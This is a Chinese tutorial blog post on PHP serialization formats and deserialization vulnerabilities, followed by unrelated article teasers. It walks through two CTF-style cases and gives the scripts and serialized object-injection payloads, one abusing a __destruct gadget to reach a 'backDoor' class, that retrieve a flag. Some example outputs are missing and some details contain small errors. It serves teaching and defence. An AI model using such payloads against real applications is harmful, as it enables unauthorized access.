序列化与反序列化基础及反序列化漏洞(附案例)

ops/2024/12/22 19:51:55/

参考文章:

[web安全原理]PHP反序列化漏洞 - 笑花大王 - 博客园 (cnblogs.com)

一、概念

        为了能有效的存储数据而不丢失数据的类型和内容,经常需要通过序列化对数据进行处理,将数据进行序列化后,会生成一个字符串,字符串包含了序列化前的数据的信息,交由反序列化函数处理后,即可复原数据。

        而在PHP中常用的序列化和反序列化函数则有:序列化函数(serializejson_encode),反序列化函数(unserializejson_decode)

二、PHP序列化

        这里着重介绍serialize函数

1、NULL序列化

        NULL将被序列化为N;:

        示例代码:

php"><?php
$text = NULL;
echo serialize($text);

        输出结果:

2、Boolean序列化 

        bool类型将被序列化为(b:value;):

        示例代码:

php"><?php
$text = true;
echo serialize($text);

        输出结果:

3、int序列化

        int类型将被序列化为(i:value;):

        由于在PHP中声明变量时不需要显式的将数据类型标出,因此当超出了int类型的范围(通常是-2,147,483,648到2,147,483,647)时,会被PHP解析为double类型

        示例代码:

php"><?php
$text = 123;
echo serialize($text);

        输出结果:

4、double序列化 

        double类型将被序列化为(d:value;):

        在PHP中类似于1.23和超出int类型范围(如:123124315213412512)的数据,通常都会被解释为double类型

        示例代码:

php"><?php
$text = 12.3;
$text1 = 123124124124123124;
echo serialize($text)."<br>";
echo serialize($text1);

         输出结果:

5、String序列化 

        String类型将被序列化为(s:length:"value"):

        示例代码:

php"><?php
$text = "e3xplolt-hada";
echo serialize($text);

        输出结果:

 6、Array序列化

        Array将被序列化为(a:length:{i:index;value(对应数据序列化后的结果如NULL则是N;);}):

        示例代码:

php"><?php
$text = array();
$text[0] = NULL;
$text[1] = true;
$text[2] = 123;
$text[3] = 1.23;
$text[4] = 123124315213412512;
$text[5] = "e3xplolt-hada";
echo serialize($text);

        输出结果:

 7、Object序列化*

        Obeject将被序列化为

(O:class_name_length:"class_name":value_num:{s:value_attribute(1,2+class_name_length+value_name_length,3+value_name_length):"value_name";value_type:value;})若属性为privatevalue_name为(class_name.value_name),若属性为protectedvalue_name为(*.value_name)

注: class_name=类名、class_name_length=类名长度

        value_name=变量名、value_name_length=变量名长度、value_type=变量类型(如intbool)、value_attribute=变量属性(如publicprivateprotected)、value_num=变量个数

        其中value_attribute后的1,2,3则分别代表publicprivateprotected,如在test1类内有一个变量为private $b="789",则序列化后value_attribute值为2+class_name_length(test1长度为5)+value_name_length(b长度为1),即2+5+1=8,所以为8

        示例代码:

php"><?php
class test1{public $a;private $b="789";private $ca="aacc";protected $c123=456; 
}
$test = new test1;
$test -> a = 123;
echo serialize($test);

        输出结果:

O:5:"test1":4:{s:1:"a";i:123;s:8:"test1b";s:3:"789";s:9:"test1ca";s:4:"aacc";s:7:"*c123";i:456;}

三、PHP反序列化

1、魔术方法

        __wake与__unserialize

        当对序列化后的对象进行反序列化时,在PHP存在类似于__wakeup__unserialize魔术方法,每次unserialize函数对对象进行反序列化操作时,都会尝试调用这个对象所属类中的__wakeup__unserialize方法,如果存在就会执行

        注:若__wakeup__unserialize方法同时存在,则__wakeup方法会被无视

        示例代码:

php"><?php
class test1{public $a;public function __wakeup(){echo "<br>"."e3xplolt-hada";}
}
$test = new test1;
$test -> a = 123;
echo serialize($test);
$test123=serialize($test);
$test=unserialize($test123);

        输出结果:

        __destruct

        该魔术方法会在某个对象不再被调用或者对象被销毁时调用

        示例代码:

php"><?php
class test1{public $a;public function __destruct(){echo "<br>"."e3xplolt-hada";}
}
$test = new test1;
$test -> a = 123;

         输出结果:

        

四、反序列化漏洞

1、漏洞成因

        反序列化函数传入参数可控

        类内存在魔法函数

2、案例分析

        unserialize函数传参可控

php"><?php
include "./flag.php";
class user{public $password="xxxxxx";public $username="xxxxxx";public $isadmin='e3xplolt-hada';public function login($u,$p,$id){if($this->username===$u&&$this->password===$p){$this->checkadmin($id); }}public function checkadmin($id){if($id===$this->isadmin){global $flag;echo "hello,admin:".$flag;}}
}
$user=unserialize($_GET['ser']);
$user->login($user->username,$user->password,$user->isadmin);

        分析代码:

        我们可以发现在函数unserialize中存在可控制的变量$_GET['ser'],同时他会在之后调用该类下的login方法,因此正常业务逻辑应为传输用户序列化后的信息给unserialize函数,再通过login进行登录并检测权限,但由于这里的传参未经正确的处理因此产生反序列化漏洞。这里可通过构造一个对象其$password变量为xxxxxx$username变量为xxxxxx$isadmin变量为e3xplolt-hada即可,因此我们有如下脚本可生成payload

        脚本代码:

php"><?php
class user{public $password="xxxxxx";public $username="xxxxxx";public $isadmin='e3xplolt-hada';
}
$text = new user;
echo serialize($text);

        payload:

O:4:"user":3:{s:8:"password";s:6:"xxxxxx";s:8:"username";s:6:"xxxxxx";s:7:"isadmin";s:13:"e3xplolt-hada";}

输出结果为:hello,admin:flag{hardtowork}

        魔术方法使用不当

php"><?php
include "./flag.php";
class user{private $username='xxxxxx';private $password='xxxxxx';private $isVip=false;private $class = 'info';public function __construct(){$this->class=new info();}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}}class info{private $user='xxxxxx';public function getInfo(){return $this->user;}
}class backDoor{private $code;public function getInfo(){if($this->code==="givemeflag"){global $flag;echo $flag;}}
}
$user = unserialize($_GET['ser']);

         分析代码:

        分析代码可知如果我们想要获取flag,我们需要尝试用一个属于backDoor类的对象,去调用getInfo方法,并且该对象的私有变量code必须是字符串"givemeflag"。

        通过观察类user发现他会在创建一个新对象时,创建一个Info类的对象,并存储在class中。

        同时我们发现,当user类下的对象不再被调用或被销毁时会调用class所存储的对象所属类下的getInfo方法。

        从上面的分析我们可以得出突破口在__destruct方法中,若我们利用$user = unserialize($_GET['ser']);传入一个对象,该对象内部的变量class所存储的对象属于backDoor类,且该对象内的code变量值为"givemeflag",当对象被销毁时,则会自动调用backDoor类下的getInfo函数,获取flag

        脚本代码:

php"><?php
class user{private $username='xxxxxx';private $password='xxxxxx';private $isVip=ture;          private $class = 'backDoor';public function __construct(){$this->class=new backDoor();}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}
}
class info{private $user='xxxxxx';public function getInfo(){return $this->user;}
}
class backDoor{private $code="givemeflag";public function getInfo(){if($this->code==="givemeflag"){global $flag;echo $flag;}}   
}
$p=new user();
$a=serialize($p);
echo urlencode($a);

        payload:

 O%3A4%3A%22user%22%3A4%3A%7Bs%3A14%3A%22%00user%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A14%3A%22%00user%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A11%3A%22%00user%00isVip%22%3Bs%3A4%3A%22ture%22%3Bs%3A11%3A%22%00user%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A10%3A%22givemeflag%22%3B%7D%7D

注:需保留URL编码,否则不认,原因暂不清楚

五、防御手段

        针对反序列化漏洞,我们需要着重观察函数unserialize及json_decode,注意可控参数的过滤

        同时关注类中如果出现魔术方法如__unserialize、__wakeup、__destruct时,需谨慎对待,过滤传参,保护其下的敏感函数如eval,system等


http://www.ppmy.cn/ops/123138.html

相关文章

王春城 | 如何处理班组管理中出现的人际冲突?

在日常工作中&#xff0c;由于性格差异、工作压力、沟通不畅等多种原因&#xff0c;班组管理中难免会出现人际冲突。这些冲突若不能得到妥善处理&#xff0c;不仅会影响团队的凝聚力&#xff0c;还可能阻碍工作进度&#xff0c;降低整体绩效。因此&#xff0c;掌握有效的策略来…

C++头文件

C中的头文件&#xff08;header file&#xff09;通常用于声明函数、类、变量或其他代码组件&#xff0c;以便在不同的源文件之间共享这些声明。头文件的扩展名通常是.h或者.hpp。在C项目中&#xff0c;头文件的主要作用是将接口与实现分离&#xff0c;从而使代码更加模块化和易…

音频剪辑在线工具 —— 让声音更精彩

你是否曾梦想过拥有自己的声音创作空间&#xff0c;却苦于复杂的音频编辑软件&#xff1f;接下来&#xff0c;让我们一同揭开这些音频剪辑在线工具的神秘面纱&#xff0c;看看它们如何帮助你实现从录音到发布的无缝衔接。 1.福昕音频剪辑 链接直达>>https://www.foxits…

各省常住人口及人口密度面板数据(2000-2022年)

常住人口指在某地区居住超过一定时间&#xff08;通常为半年以上&#xff09;的人口&#xff0c;而人口密度则指每平方千米或每公顷内的常住人口数。数据集的主要指标包括&#xff1a; 省份年份常住人口&#xff08;万人&#xff09;人口密度&#xff08;人/平方公里&#xff…

系统架构设计师教程 第12章 12.2 信息系统架构 笔记

12.2 信息系统架构 ★★★☆☆ 12.2.1 架构风格 信息系统架构风格是描述某一特定应用领域中系统组织方式的惯用模式。架构风格定义了一个系统家族&#xff0c;即一个架构定义一个词汇表和一组约束。 词汇表中包含一些构件和连接件类型&#xff0c; 约束指出系统是如何将这些…

UE5数字人制作平台使用及3D模型生成

第10章 数字人制作平台使用及3D模型生成 在数字娱乐、虚拟现实&#xff08;VR&#xff09;、增强现实&#xff08;AR&#xff09;等领域&#xff0c;高质量的3D模型是数字内容创作的核心。本章将引导你了解如何使用UE5&#xff08;Unreal Engine 5&#xff09;虚幻引擎这一强大…

【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议

3.2 数据传输和协议 这一部分将探索网络传输中数据的组织和操纵方式&#xff0c;包括数据封包和拆包、数据完整性校验以及数据序列化与反序列化的方法。这些知识对确保数据可靠和高效传输至关重要。 3.2.1 数据传输 3.2.1.1 数据封包与拆包 定义&#xff1a;数据封包是指将数…

MySQL中的索引

索引相关概念 基础概念&#xff1a; 在MySQL中&#xff0c;索引是一种数据结构&#xff0c;用于加快数据库查询的速度和性能。索引可以帮助MySQL快速定位和访问表中的特定数据&#xff0c;就像书籍的索引一样&#xff0c;通过存储指向数据行的指针&#xff0c;可以快速…